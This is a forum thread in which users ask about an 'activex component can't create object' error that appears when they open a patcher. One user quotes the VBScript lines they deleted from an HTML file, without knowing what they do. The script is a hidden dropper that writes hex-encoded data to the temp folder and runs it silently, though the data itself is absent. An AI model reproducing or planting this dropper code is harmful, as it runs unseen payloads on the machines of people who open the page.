Erio-chan Posted August 3, 2016 Group: Members Topic Count: 35 Topics Per Day: 0.01 Content Count: 97 Reputation: 10 Joined: 07/23/16 Last Seen: August 31, 2018 Share Posted August 3, 2016 activex component can't create object I can patch anything no prob with that just this error annoy me always pops up when I open my patcher Quote Link to comment Share on other sites More sharing options...
0 Erio-chan Posted August 3, 2016 Group: Members Topic Count: 35 Topics Per Day: 0.01 Content Count: 97 Reputation: 10 Joined: 07/23/16 Last Seen: August 31, 2018 Author Share Posted August 3, 2016 (edited) same here jajajajajaja Someone know how to solve that? i think its related to Internet Explorer and the notice.html I have just figure out it my self I open the file ( in my case its index.html) that causing the error in c++ note I deleted 1 by 1 all script line that constantly appearing in the popup error these are the lines that I have deleted Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 I dunno what is that and what is the function of that script but I tested my Patcher and it works perfectly with no error I hope someone here would explain us what is that script Edited August 3, 2016 by Erio-chan Quote Link to comment Share on other sites More sharing options...
0 Felten Posted August 3, 2016 Group: Members Topic Count: 10 Topics Per Day: 0.00 Content Count: 104 Reputation: 15 Joined: 01/18/16 Last Seen: July 15, 2024 Share Posted August 3, 2016 same here jajajajajaja Someone know how to solve that? i think its related to Internet Explorer and the notice.html Quote Link to comment Share on other sites More sharing options...
Question
Erio-chan
activex component can't create object
I can patch anything no prob with that just this error annoy me
always pops up when I open my patcher
Link to comment
Share on other sites
2 answers to this question
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.